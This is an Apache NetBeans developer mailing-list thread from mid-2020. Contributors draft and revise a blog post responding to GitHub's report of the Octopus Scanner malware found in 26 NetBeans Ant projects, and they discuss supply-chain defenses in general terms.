Proposed blog on malware report

[Geertjan Wielenga <ge...@apache.org>]

Hi all,

I propose we publish the following on the Apache NetBeans blog re the
recent announcement by GitHub researchers of malware found in some NetBeans
generated projects on GitHub.

Title: Malware Found in 26 NetBeans Ant Projects on GitHub

Content:

"Researchers at GitHub have identified 26 projects on GitHub that have been
infected by malware. The malware infiltrates the project structure of
Ant-based applications in the format generated specifically by NetBeans.
The owners of the 26 projects, which are mostly small Java applications,
have been contacted and the infected projects have been set to private on
GitHub. The malware campaign is no longer active, GitHub did not consider
it relevant enough to be in touch with the NetBeans community about it, and
there is no evidence that applications beyond the 26 in question have been
impacted. Be aware that any project structure that you use when developing
applications can be infiltrated by malware and make sure that the files you
check into your versioning system are your own or that you know where they
come from and what they do."


Feedback welcome and needed.

Gj

Re: Re: Proposed blog on malware report

[Erik Costlow <er...@outlook.com>]

The initial vector is unknown. With a total of 26 repositories for unknown projects identified among millions of Java repositories, this looks to me like someone was tinkering with malware creation and happened to be using this older build system. With the small number maybe the author owned the repos.
The entry point is not through NetBeans (unless someone clones those repos). If there were, it would prompt more prudent action to resolve the issue and improve defenses.
Even if NetBeans removed that ant build mechanism, one would simply move the payload into a different part of the build system such as a maven plugin, gradle command, or anything else that executes such as a unit test.

These supply chain attacks are becoming more common; I've seen them over with Node, Roby, and an older one that went after Facebook devs. People check code out in IDEs to read it better and work with tools. If checking code out runs commands, that creates an opportunity (even if via the build system).

A good mechanism here for defense would be enumerating what runs and where code comes from. There's a field here called "Software Composition Analysis" that does some of this but it is dependency-focused rather than build-focused.
I would first map the attack surface, which in this case is what runs (scripts, code, etc) and what gets downloaded as a project is checked out, built, and tested/run. If you'd cloned one of those 26 repos, what would you like to have seen? Microsoft AppInspector is a moderately close example (https://www.microsoft.com/security/blog/2020/01/16/introducing-microsoft-application-inspector/) for later in the dev cycle.
Then I would use that map to isolate sensitive operations from the developer machine. Maybe new projects build in isolated containers. Maybe people enable a certain build config and run the rest: first-time with minimal prompts.

________________________________
From: Eric Bresie <eb...@gmail.com>
Sent: Thursday, June 4, 2020 12:02 AM
To: Netbeans Developer List <de...@netbeans.apache.org>
Subject: Re: Re: Proposed blog on malware report

So a few comments:

(1) So am I reading this that problem is 26 “repositories” are infected? So does that mean some forked/cloned/created a given repository, worked locally, using ant based project, may have had malware on the system, infected files in the local repository, then uploaded it? So then is this more a problem of a given machine not having malware scans on their systems to locate and remove before even before committing changes to a give repository?

(2) Is it worth checking to see if there are any github actions or Travis to run a virus/malware scanner during github commit or build at some point? Maybe if change committed any infection it would fail a build?

(3) For the repositories in question (still unclear which ones- unless they’ve been contacted separately) assume some form of PR or commit happened when the infection occurred. Is it possible to identify the initial source and (1) ensure they are notified of the need to possibly cleaning out any local malware infected files,(2) ensure this was not done maliciously, etc?

(4) if the problem is due to a Netbean ant project structure, does this mean some form of change of structure could prevent this? If this is due to ant then has Apache ant team have anything to add or fix for this?

(5) is some ticket needed to update Netbeans in any way to help mitigate this in someway? Or in each impacted repository?

Sure there could be more but to further the discussion.

Eric Bresie
Ebresie@gmail.com
> On June 1, 2020 at 6:29:33 AM CDT, Geertjan Wielenga <ge...@apache.org> wrote:
> Also sent it to announce@apache.org.
>
> I'll wait a few hours for any comments anyone has on the text, which is a
> bit of a mosaic of the comments throughout this thread -- mostly by Eric
> Costlow, many thanks! -- and will then tweet this, etc.
>
> Gj
>
> On Mon, Jun 1, 2020 at 1:27 PM Geertjan Wielenga <ge...@apache.org>
> wrote:
>
> >
> > https://blogs.apache.org/netbeans/entry/newly-identified-inactive-malware-campaign
> >
> > There it is!
> >
> > Gj
> >
> > On Mon, Jun 1, 2020 at 11:55 AM Sally Khudairi <sk...@apache.org> wrote:
> >
> > > Thank you, Geertjan; hello, everyone.
> > >
> > > Great work --I first noticed what had happened from Emilian's, followed
> > > by your, tweets yesterday. I see that quite a few articles are out on this
> > > Octopus Scanner campaign.
> > >
> > > Rapid response is essential to avoid further confusion/miscommunication,
> > > so great work on getting on this straight away.
> > >
> > > I have two minor requests: if you could 1) please refer to "Apache Ant"
> > > and "Apache NetBeans" upon the first mention of the projects in the post,
> > > that would be great. Also, 2) send this to announce@apache.org so we can
> > > help spread the word.
> > >
> > > I'll be standing by to help with any media queries that come through for
> > > the PMC.
> > >
> > > Many kind thanks for your ongoing efforts.
> > >
> > > Best,
> > > Sally
> > >
> > > - - -
> > > Vice President Marketing & Publicity
> > > Vice President Sponsor Relations
> > > The Apache Software Foundation
> > >
> > > Tel +1 617 921 8656 | sk@apache.org
> > >
> > >
> > > On Mon, Jun 1, 2020, at 02:48, Geertjan Wielenga wrote:
> > > >
> > > > Hi Sally,
> > > >
> > > > We propose putting the below on the Apache NetBeans blog re the GitHub
> > > malware report on the inactive malware campaign.
> > > >
> > > > To everyone else — Sally is VP Marketing and Publicity at Apache.
> > > >
> > > > Thanks, and thanks Eric for your rewrite of the text.
> > > >
> > > > Gj
> > > >
> > > > On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com>
> > > wrote:
> > > > > If making any comment at all, I would rewrite. If there were a
> > > vulnerability or the attack was large, I'm sure the GitHub team would have
> > > gotten in touch. The key themes are:
> > > > >
> > > > > 1. The attack was small, isolated, and is over
> > > > > 2. Most builds do not leverage anything netbeans-specific, such as
> > > this ant build (I guessed at 2006)
> > > > > 3. Software supply chain risk is legitimate and if action were needed
> > > or is needed in the future, something would happen
> > > > >
> > > > > Researchers at GitHub have identified 26 projects on GitHub that have
> > > been infected by malware. The initial point of infection is undetermined
> > > and all activity with the malware has been shut down. The malware relied on
> > > projects created using an older customized ant-based build system that has
> > > been in limited use since 2006. This does not impact users of other build
> > > systems like Maven or Gradle, or even most ant users. The majority of
> > > NetBeans projects leverage native build tool integrations that is shared
> > > with continuous integration systems.
> > > > > With over 44 million repositories hosted on GitHub[2], the scope of
> > > these 26 projects looks isolated and does not significantly impact the
> > > NetBeans community.
> > > > > Software Supply Chain attacks are not unique to any IDE and the
> > > NetBeans contributor team will monitor the threat landscape to keep
> > > developers safe and aware.
> > > > >
> > > > > [1]
> > > https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
> > > > > [2]
> > > https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
> > > > >
> > > > >
> > > > > "Researchers at GitHub have identified 26 projects on GitHub that have
> > > been
> > > > > infected by malware. The malware infiltrates the project structure of
> > > > > Ant-based applications in the format generated specifically by
> > > NetBeans.
> > > > > The owners of the 26 projects, which are mostly small Java
> > > applications,
> > > > > have been contacted and the infected projects have been set to private
> > > on
> > > > > GitHub. The malware campaign is no longer active, GitHub did not
> > > consider
> > > > > it relevant enough to be in touch with the NetBeans community about
> > > it, and
> > > > > there is no evidence that applications beyond the 26 in question have
> > > been
> > > > > impacted. Be aware that any project structure that you use when
> > > developing
> > > > > applications can be infiltrated by malware and make sure that the
> > > files you
> > > > > check into your versioning system are your own or that you know where
> > > they
> > > > > come from and what they do."
> > > > >
> > > > >
> > > > > ________________________________
> > > > > From: Neil C Smith <ne...@apache.org>
> > > > > Sent: Sunday, May 31, 2020 1:51 PM
> > > > > To: dev <de...@netbeans.apache.org>
> > > > > Subject: Re: Proposed blog on malware report
> > > > >
> > > > > On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org>
> > > wrote:
> > > > >
> > > > > > Be aware that any project structure that you use when developing
> > > > > > applications can be infiltrated by malware and make sure that the
> > > files you
> > > > > > check into your versioning system are your own or that you know
> > > where they
> > > > > > come from and what they do."
> > > > > >
> > > > > >
> > > > > > Feedback welcome and needed.
> > > > > >
> > > > >
> > > > > Looks good to me, but I'd be tempted to emphasise "when developing
> > > > > applications, with any IDE or build system, ..." And also that you
> > > should
> > > > > treat building untrusted code the same way you'd treat running
> > > untrusted
> > > > > binaries, ie. carefully.
> > > > >
> > > > > Interesting that the GitHub article doesn't mention that this applies
> > > to
> > > > > projects that were originally structured with Ant in NetBeans. You
> > > wouldn't
> > > > > have to still be building in the IDE to be exploited here?
> > > > >
> > > > > Best wishes,
> > > > >
> > > > > Neil
> > > > >
> > > > > >
> >
> >

Re: Re: Proposed blog on malware report

[Eric Bresie <eb...@gmail.com>]

So a few comments:

(1) So am I reading this that problem is 26 “repositories” are infected? So does that mean some forked/cloned/created a given repository, worked locally, using ant based project, may have had malware on the system, infected files in the local repository, then uploaded it? So then is this more a problem of a given machine not having malware scans on their systems to locate and remove before even before committing changes to a give repository?

(2) Is it worth checking to see if there are any github actions or Travis to run a virus/malware scanner during github commit or build at some point? Maybe if change committed any infection it would fail a build?

(3) For the repositories in question (still unclear which ones- unless they’ve been contacted separately) assume some form of PR or commit happened when the infection occurred. Is it possible to identify the initial source and (1) ensure they are notified of the need to possibly cleaning out any local malware infected files,(2) ensure this was not done maliciously, etc?

(4) if the problem is due to a Netbean ant project structure, does this mean some form of change of structure could prevent this? If this is due to ant then has Apache ant team have anything to add or fix for this?

(5) is some ticket needed to update Netbeans in any way to help mitigate this in someway? Or in each impacted repository?

Sure there could be more but to further the discussion.

Eric Bresie
Ebresie@gmail.com
> On June 1, 2020 at 6:29:33 AM CDT, Geertjan Wielenga <ge...@apache.org> wrote:
> Also sent it to announce@apache.org.
>
> I'll wait a few hours for any comments anyone has on the text, which is a
> bit of a mosaic of the comments throughout this thread -- mostly by Eric
> Costlow, many thanks! -- and will then tweet this, etc.
>
> Gj
>
> On Mon, Jun 1, 2020 at 1:27 PM Geertjan Wielenga <ge...@apache.org>
> wrote:
>
> >
> > https://blogs.apache.org/netbeans/entry/newly-identified-inactive-malware-campaign
> >
> > There it is!
> >
> > Gj
> >
> > On Mon, Jun 1, 2020 at 11:55 AM Sally Khudairi <sk...@apache.org> wrote:
> >
> > > Thank you, Geertjan; hello, everyone.
> > >
> > > Great work --I first noticed what had happened from Emilian's, followed
> > > by your, tweets yesterday. I see that quite a few articles are out on this
> > > Octopus Scanner campaign.
> > >
> > > Rapid response is essential to avoid further confusion/miscommunication,
> > > so great work on getting on this straight away.
> > >
> > > I have two minor requests: if you could 1) please refer to "Apache Ant"
> > > and "Apache NetBeans" upon the first mention of the projects in the post,
> > > that would be great. Also, 2) send this to announce@apache.org so we can
> > > help spread the word.
> > >
> > > I'll be standing by to help with any media queries that come through for
> > > the PMC.
> > >
> > > Many kind thanks for your ongoing efforts.
> > >
> > > Best,
> > > Sally
> > >
> > > - - -
> > > Vice President Marketing & Publicity
> > > Vice President Sponsor Relations
> > > The Apache Software Foundation
> > >
> > > Tel +1 617 921 8656 | sk@apache.org
> > >
> > >
> > > On Mon, Jun 1, 2020, at 02:48, Geertjan Wielenga wrote:
> > > >
> > > > Hi Sally,
> > > >
> > > > We propose putting the below on the Apache NetBeans blog re the GitHub
> > > malware report on the inactive malware campaign.
> > > >
> > > > To everyone else — Sally is VP Marketing and Publicity at Apache.
> > > >
> > > > Thanks, and thanks Eric for your rewrite of the text.
> > > >
> > > > Gj
> > > >
> > > > On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com>
> > > wrote:
> > > > > If making any comment at all, I would rewrite. If there were a
> > > vulnerability or the attack was large, I'm sure the GitHub team would have
> > > gotten in touch. The key themes are:
> > > > >
> > > > > 1. The attack was small, isolated, and is over
> > > > > 2. Most builds do not leverage anything netbeans-specific, such as
> > > this ant build (I guessed at 2006)
> > > > > 3. Software supply chain risk is legitimate and if action were needed
> > > or is needed in the future, something would happen
> > > > >
> > > > > Researchers at GitHub have identified 26 projects on GitHub that have
> > > been infected by malware. The initial point of infection is undetermined
> > > and all activity with the malware has been shut down. The malware relied on
> > > projects created using an older customized ant-based build system that has
> > > been in limited use since 2006. This does not impact users of other build
> > > systems like Maven or Gradle, or even most ant users. The majority of
> > > NetBeans projects leverage native build tool integrations that is shared
> > > with continuous integration systems.
> > > > > With over 44 million repositories hosted on GitHub[2], the scope of
> > > these 26 projects looks isolated and does not significantly impact the
> > > NetBeans community.
> > > > > Software Supply Chain attacks are not unique to any IDE and the
> > > NetBeans contributor team will monitor the threat landscape to keep
> > > developers safe and aware.
> > > > >
> > > > > [1]
> > > https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
> > > > > [2]
> > > https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
> > > > >
> > > > >
> > > > > "Researchers at GitHub have identified 26 projects on GitHub that have
> > > been
> > > > > infected by malware. The malware infiltrates the project structure of
> > > > > Ant-based applications in the format generated specifically by
> > > NetBeans.
> > > > > The owners of the 26 projects, which are mostly small Java
> > > applications,
> > > > > have been contacted and the infected projects have been set to private
> > > on
> > > > > GitHub. The malware campaign is no longer active, GitHub did not
> > > consider
> > > > > it relevant enough to be in touch with the NetBeans community about
> > > it, and
> > > > > there is no evidence that applications beyond the 26 in question have
> > > been
> > > > > impacted. Be aware that any project structure that you use when
> > > developing
> > > > > applications can be infiltrated by malware and make sure that the
> > > files you
> > > > > check into your versioning system are your own or that you know where
> > > they
> > > > > come from and what they do."
> > > > >
> > > > >
> > > > > ________________________________
> > > > > From: Neil C Smith <ne...@apache.org>
> > > > > Sent: Sunday, May 31, 2020 1:51 PM
> > > > > To: dev <de...@netbeans.apache.org>
> > > > > Subject: Re: Proposed blog on malware report
> > > > >
> > > > > On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org>
> > > wrote:
> > > > >
> > > > > > Be aware that any project structure that you use when developing
> > > > > > applications can be infiltrated by malware and make sure that the
> > > files you
> > > > > > check into your versioning system are your own or that you know
> > > where they
> > > > > > come from and what they do."
> > > > > >
> > > > > >
> > > > > > Feedback welcome and needed.
> > > > > >
> > > > >
> > > > > Looks good to me, but I'd be tempted to emphasise "when developing
> > > > > applications, with any IDE or build system, ..." And also that you
> > > should
> > > > > treat building untrusted code the same way you'd treat running
> > > untrusted
> > > > > binaries, ie. carefully.
> > > > >
> > > > > Interesting that the GitHub article doesn't mention that this applies
> > > to
> > > > > projects that were originally structured with Ant in NetBeans. You
> > > wouldn't
> > > > > have to still be building in the IDE to be exploited here?
> > > > >
> > > > > Best wishes,
> > > > >
> > > > > Neil
> > > > >
> > > > > >
> >
> >

Re: Proposed blog on malware report

[Geertjan Wielenga <ge...@apache.org>]

Also sent it to announce@apache.org.

I'll wait a few hours for any comments anyone has on the text, which is a
bit of a mosaic of the comments throughout this thread -- mostly by Eric
Costlow, many thanks! -- and will then tweet this, etc.

Gj

On Mon, Jun 1, 2020 at 1:27 PM Geertjan Wielenga <ge...@apache.org>
wrote:

>
> https://blogs.apache.org/netbeans/entry/newly-identified-inactive-malware-campaign
>
> There it is!
>
> Gj
>
> On Mon, Jun 1, 2020 at 11:55 AM Sally Khudairi <sk...@apache.org> wrote:
>
>> Thank you, Geertjan; hello, everyone.
>>
>> Great work --I first noticed what had happened from Emilian's, followed
>> by your, tweets yesterday. I see that quite a few articles are out on this
>> Octopus Scanner campaign.
>>
>> Rapid response is essential to avoid further confusion/miscommunication,
>> so great work on getting on this straight away.
>>
>> I have two minor requests: if you could 1) please refer to "Apache Ant"
>> and "Apache NetBeans" upon the first mention of the projects in the post,
>> that would be great. Also, 2) send this to announce@apache.org so we can
>> help spread the word.
>>
>> I'll be standing by to help with any media queries that come through for
>> the PMC.
>>
>> Many kind thanks for your ongoing efforts.
>>
>> Best,
>> Sally
>>
>> - - -
>> Vice President Marketing & Publicity
>> Vice President Sponsor Relations
>> The Apache Software Foundation
>>
>> Tel +1 617 921 8656 | sk@apache.org
>>
>>
>> On Mon, Jun 1, 2020, at 02:48, Geertjan Wielenga wrote:
>> >
>> > Hi Sally,
>> >
>> > We propose putting the below on the Apache NetBeans blog re the GitHub
>> malware report on the inactive malware campaign.
>> >
>> > To everyone else — Sally is VP Marketing and Publicity at Apache.
>> >
>> > Thanks, and thanks Eric for your rewrite of the text.
>> >
>> > Gj
>> >
>> > On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com>
>> wrote:
>> >> If making any comment at all, I would rewrite. If there were a
>> vulnerability or the attack was large, I'm sure the GitHub team would have
>> gotten in touch. The key themes are:
>> >>
>> >>  1. The attack was small, isolated, and is over
>> >>  2. Most builds do not leverage anything netbeans-specific, such as
>> this ant build (I guessed at 2006)
>> >>  3. Software supply chain risk is legitimate and if action were needed
>> or is needed in the future, something would happen
>> >>
>> >> Researchers at GitHub have identified 26 projects on GitHub that have
>> been infected by malware. The initial point of infection is undetermined
>> and all activity with the malware has been shut down. The malware relied on
>> projects created using an older customized ant-based build system that has
>> been in limited use since 2006. This does not impact users of other build
>> systems like Maven or Gradle, or even most ant users. The majority of
>> NetBeans projects leverage native build tool integrations that is shared
>> with continuous integration systems.
>> >> With over 44 million repositories hosted on GitHub[2], the scope of
>> these 26 projects looks isolated and does not significantly impact the
>> NetBeans community.
>> >> Software Supply Chain attacks are not unique to any IDE and the
>> NetBeans contributor team will monitor the threat landscape to keep
>> developers safe and aware.
>> >>
>> >> [1]
>> https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
>> >> [2]
>> https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
>> >>
>> >>
>> >> "Researchers at GitHub have identified 26 projects on GitHub that have
>> been
>> >> infected by malware. The malware infiltrates the project structure of
>> >> Ant-based applications in the format generated specifically by
>> NetBeans.
>> >> The owners of the 26 projects, which are mostly small Java
>> applications,
>> >> have been contacted and the infected projects have been set to private
>> on
>> >> GitHub. The malware campaign is no longer active, GitHub did not
>> consider
>> >> it relevant enough to be in touch with the NetBeans community about
>> it, and
>> >> there is no evidence that applications beyond the 26 in question have
>> been
>> >> impacted. Be aware that any project structure that you use when
>> developing
>> >> applications can be infiltrated by malware and make sure that the
>> files you
>> >> check into your versioning system are your own or that you know where
>> they
>> >> come from and what they do."
>> >>
>> >>
>> >> ________________________________
>> >> From: Neil C Smith <ne...@apache.org>
>> >> Sent: Sunday, May 31, 2020 1:51 PM
>> >> To: dev <de...@netbeans.apache.org>
>> >> Subject: Re: Proposed blog on malware report
>> >>
>> >> On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org>
>> wrote:
>> >>
>> >> > Be aware that any project structure that you use when developing
>> >> > applications can be infiltrated by malware and make sure that the
>> files you
>> >> > check into your versioning system are your own or that you know
>> where they
>> >> > come from and what they do."
>> >> >
>> >> >
>> >> > Feedback welcome and needed.
>> >> >
>> >>
>> >> Looks good to me, but I'd be tempted to emphasise "when developing
>> >> applications, with any IDE or build system, ..." And also that you
>> should
>> >> treat building untrusted code the same way you'd treat running
>> untrusted
>> >> binaries, ie. carefully.
>> >>
>> >> Interesting that the GitHub article doesn't mention that this applies
>> to
>> >> projects that were originally structured with Ant in NetBeans. You
>> wouldn't
>> >> have to still be building in the IDE to be exploited here?
>> >>
>> >> Best wishes,
>> >>
>> >> Neil
>> >>
>> >> >
>
>

Re: Proposed blog on malware report

[Geertjan Wielenga <ge...@apache.org>]

https://blogs.apache.org/netbeans/entry/newly-identified-inactive-malware-campaign

There it is!

Gj

On Mon, Jun 1, 2020 at 11:55 AM Sally Khudairi <sk...@apache.org> wrote:

> Thank you, Geertjan; hello, everyone.
>
> Great work --I first noticed what had happened from Emilian's, followed by
> your, tweets yesterday. I see that quite a few articles are out on this
> Octopus Scanner campaign.
>
> Rapid response is essential to avoid further confusion/miscommunication,
> so great work on getting on this straight away.
>
> I have two minor requests: if you could 1) please refer to "Apache Ant"
> and "Apache NetBeans" upon the first mention of the projects in the post,
> that would be great. Also, 2) send this to announce@apache.org so we can
> help spread the word.
>
> I'll be standing by to help with any media queries that come through for
> the PMC.
>
> Many kind thanks for your ongoing efforts.
>
> Best,
> Sally
>
> - - -
> Vice President Marketing & Publicity
> Vice President Sponsor Relations
> The Apache Software Foundation
>
> Tel +1 617 921 8656 | sk@apache.org
>
>
> On Mon, Jun 1, 2020, at 02:48, Geertjan Wielenga wrote:
> >
> > Hi Sally,
> >
> > We propose putting the below on the Apache NetBeans blog re the GitHub
> malware report on the inactive malware campaign.
> >
> > To everyone else — Sally is VP Marketing and Publicity at Apache.
> >
> > Thanks, and thanks Eric for your rewrite of the text.
> >
> > Gj
> >
> > On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com>
> wrote:
> >> If making any comment at all, I would rewrite. If there were a
> vulnerability or the attack was large, I'm sure the GitHub team would have
> gotten in touch. The key themes are:
> >>
> >>  1. The attack was small, isolated, and is over
> >>  2. Most builds do not leverage anything netbeans-specific, such as
> this ant build (I guessed at 2006)
> >>  3. Software supply chain risk is legitimate and if action were needed
> or is needed in the future, something would happen
> >>
> >> Researchers at GitHub have identified 26 projects on GitHub that have
> been infected by malware. The initial point of infection is undetermined
> and all activity with the malware has been shut down. The malware relied on
> projects created using an older customized ant-based build system that has
> been in limited use since 2006. This does not impact users of other build
> systems like Maven or Gradle, or even most ant users. The majority of
> NetBeans projects leverage native build tool integrations that is shared
> with continuous integration systems.
> >> With over 44 million repositories hosted on GitHub[2], the scope of
> these 26 projects looks isolated and does not significantly impact the
> NetBeans community.
> >> Software Supply Chain attacks are not unique to any IDE and the
> NetBeans contributor team will monitor the threat landscape to keep
> developers safe and aware.
> >>
> >> [1]
> https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
> >> [2]
> https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
> >>
> >>
> >> "Researchers at GitHub have identified 26 projects on GitHub that have
> been
> >> infected by malware. The malware infiltrates the project structure of
> >> Ant-based applications in the format generated specifically by NetBeans.
> >> The owners of the 26 projects, which are mostly small Java applications,
> >> have been contacted and the infected projects have been set to private
> on
> >> GitHub. The malware campaign is no longer active, GitHub did not
> consider
> >> it relevant enough to be in touch with the NetBeans community about it,
> and
> >> there is no evidence that applications beyond the 26 in question have
> been
> >> impacted. Be aware that any project structure that you use when
> developing
> >> applications can be infiltrated by malware and make sure that the files
> you
> >> check into your versioning system are your own or that you know where
> they
> >> come from and what they do."
> >>
> >>
> >> ________________________________
> >> From: Neil C Smith <ne...@apache.org>
> >> Sent: Sunday, May 31, 2020 1:51 PM
> >> To: dev <de...@netbeans.apache.org>
> >> Subject: Re: Proposed blog on malware report
> >>
> >> On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org>
> wrote:
> >>
> >> > Be aware that any project structure that you use when developing
> >> > applications can be infiltrated by malware and make sure that the
> files you
> >> > check into your versioning system are your own or that you know where
> they
> >> > come from and what they do."
> >> >
> >> >
> >> > Feedback welcome and needed.
> >> >
> >>
> >> Looks good to me, but I'd be tempted to emphasise "when developing
> >> applications, with any IDE or build system, ..." And also that you
> should
> >> treat building untrusted code the same way you'd treat running untrusted
> >> binaries, ie. carefully.
> >>
> >> Interesting that the GitHub article doesn't mention that this applies to
> >> projects that were originally structured with Ant in NetBeans. You
> wouldn't
> >> have to still be building in the IDE to be exploited here?
> >>
> >> Best wishes,
> >>
> >> Neil
> >>
> >> >

Re: Proposed blog on malware report

[Sally Khudairi <sk...@apache.org>]

Thank you, Geertjan; hello, everyone.

Great work --I first noticed what had happened from Emilian's, followed by your, tweets yesterday. I see that quite a few articles are out on this Octopus Scanner campaign. 

Rapid response is essential to avoid further confusion/miscommunication, so great work on getting on this straight away.

I have two minor requests: if you could 1) please refer to "Apache Ant" and "Apache NetBeans" upon the first mention of the projects in the post, that would be great. Also, 2) send this to announce@apache.org so we can help spread the word.

I'll be standing by to help with any media queries that come through for the PMC.

Many kind thanks for your ongoing efforts.

Best,
Sally

- - -
Vice President Marketing & Publicity
Vice President Sponsor Relations
The Apache Software Foundation

Tel +1 617 921 8656 | sk@apache.org


On Mon, Jun 1, 2020, at 02:48, Geertjan Wielenga wrote:
> 
> Hi Sally,
> 
> We propose putting the below on the Apache NetBeans blog re the GitHub malware report on the inactive malware campaign.
> 
> To everyone else — Sally is VP Marketing and Publicity at Apache.
> 
> Thanks, and thanks Eric for your rewrite of the text.
> 
> Gj
> 
> On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com> wrote:
>> If making any comment at all, I would rewrite. If there were a vulnerability or the attack was large, I'm sure the GitHub team would have gotten in touch. The key themes are:
>> 
>>  1. The attack was small, isolated, and is over
>>  2. Most builds do not leverage anything netbeans-specific, such as this ant build (I guessed at 2006)
>>  3. Software supply chain risk is legitimate and if action were needed or is needed in the future, something would happen
>> 
>> Researchers at GitHub have identified 26 projects on GitHub that have been infected by malware. The initial point of infection is undetermined and all activity with the malware has been shut down. The malware relied on projects created using an older customized ant-based build system that has been in limited use since 2006. This does not impact users of other build systems like Maven or Gradle, or even most ant users. The majority of NetBeans projects leverage native build tool integrations that is shared with continuous integration systems.
>> With over 44 million repositories hosted on GitHub[2], the scope of these 26 projects looks isolated and does not significantly impact the NetBeans community.
>> Software Supply Chain attacks are not unique to any IDE and the NetBeans contributor team will monitor the threat landscape to keep developers safe and aware.
>> 
>> [1] https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
>> [2] https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
>> 
>> 
>> "Researchers at GitHub have identified 26 projects on GitHub that have been
>> infected by malware. The malware infiltrates the project structure of
>> Ant-based applications in the format generated specifically by NetBeans.
>> The owners of the 26 projects, which are mostly small Java applications,
>> have been contacted and the infected projects have been set to private on
>> GitHub. The malware campaign is no longer active, GitHub did not consider
>> it relevant enough to be in touch with the NetBeans community about it, and
>> there is no evidence that applications beyond the 26 in question have been
>> impacted. Be aware that any project structure that you use when developing
>> applications can be infiltrated by malware and make sure that the files you
>> check into your versioning system are your own or that you know where they
>> come from and what they do."
>> 
>> 
>> ________________________________
>> From: Neil C Smith <ne...@apache.org>
>> Sent: Sunday, May 31, 2020 1:51 PM
>> To: dev <de...@netbeans.apache.org>
>> Subject: Re: Proposed blog on malware report
>> 
>> On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:
>> 
>> > Be aware that any project structure that you use when developing
>> > applications can be infiltrated by malware and make sure that the files you
>> > check into your versioning system are your own or that you know where they
>> > come from and what they do."
>> >
>> >
>> > Feedback welcome and needed.
>> >
>> 
>> Looks good to me, but I'd be tempted to emphasise "when developing
>> applications, with any IDE or build system, ..." And also that you should
>> treat building untrusted code the same way you'd treat running untrusted
>> binaries, ie. carefully.
>> 
>> Interesting that the GitHub article doesn't mention that this applies to
>> projects that were originally structured with Ant in NetBeans. You wouldn't
>> have to still be building in the IDE to be exploited here?
>> 
>> Best wishes,
>> 
>> Neil
>> 
>> >

Re: Proposed blog on malware report

[Geertjan Wielenga <ge...@apache.org>]

Hi Sally,

We propose putting the below on the Apache NetBeans blog re the GitHub
malware report on the inactive malware campaign.

To everyone else — Sally is VP Marketing and Publicity at Apache.

Thanks, and thanks Eric for your rewrite of the text.

Gj

On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com> wrote:

> If making any comment at all, I would rewrite. If there were a
> vulnerability or the attack was large, I'm sure the GitHub team would have
> gotten in touch. The key themes are:
>
>   1.  The attack was small, isolated, and is over
>   2.  Most builds do not leverage anything netbeans-specific, such as this
> ant build (I guessed at 2006)
>   3.  Software supply chain risk is legitimate and if action were needed
> or is needed in the future, something would happen
>
> Researchers at GitHub have identified 26 projects on GitHub that have been
> infected by malware. The initial point of infection is undetermined and all
> activity with the malware has been shut down. The malware relied on
> projects created using an older customized ant-based build system that has
> been in limited use since 2006. This does not impact users of other build
> systems like Maven or Gradle, or even most ant users. The majority of
> NetBeans projects leverage native build tool integrations that is shared
> with continuous integration systems.
> With over 44 million repositories hosted on GitHub[2], the scope of these
> 26 projects looks isolated and does not significantly impact the NetBeans
> community.
> Software Supply Chain attacks are not unique to any IDE and the NetBeans
> contributor team will monitor the threat landscape to keep developers safe
> and aware.
>
> [1]
> https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
> [2]
> https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
>
>
> "Researchers at GitHub have identified 26 projects on GitHub that have been
> infected by malware. The malware infiltrates the project structure of
> Ant-based applications in the format generated specifically by NetBeans.
> The owners of the 26 projects, which are mostly small Java applications,
> have been contacted and the infected projects have been set to private on
> GitHub. The malware campaign is no longer active, GitHub did not consider
> it relevant enough to be in touch with the NetBeans community about it, and
> there is no evidence that applications beyond the 26 in question have been
> impacted. Be aware that any project structure that you use when developing
> applications can be infiltrated by malware and make sure that the files you
> check into your versioning system are your own or that you know where they
> come from and what they do."
>
>
> ________________________________
> From: Neil C Smith <ne...@apache.org>
> Sent: Sunday, May 31, 2020 1:51 PM
> To: dev <de...@netbeans.apache.org>
> Subject: Re: Proposed blog on malware report
>
> On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:
>
> > Be aware that any project structure that you use when developing
> > applications can be infiltrated by malware and make sure that the files
> you
> > check into your versioning system are your own or that you know where
> they
> > come from and what they do."
> >
> >
> > Feedback welcome and needed.
> >
>
> Looks good to me, but I'd be tempted to emphasise "when developing
> applications, with any IDE or build system, ..." And also that you should
> treat building untrusted code the same way you'd treat running untrusted
> binaries, ie. carefully.
>
> Interesting that the GitHub article doesn't mention that this applies to
> projects that were originally structured with Ant in NetBeans. You wouldn't
> have to still be building in the IDE to be exploited here?
>
> Best wishes,
>
> Neil
>
> >
>

Re: Proposed blog on malware report

[Josh Juneau <ju...@gmail.com>]

+1 on a prompt response


Josh Juneau
juneau001@gmail.com
http://jj-blogger.blogspot.com
https://www.apress.com/us/search?query=Juneau

>> On May 31, 2020, at 4:28 PM, Glenn Holmer <ce...@kolabnow.com.invalid> wrote:
> On 5/31/20 3:39 PM, Erik Costlow wrote:
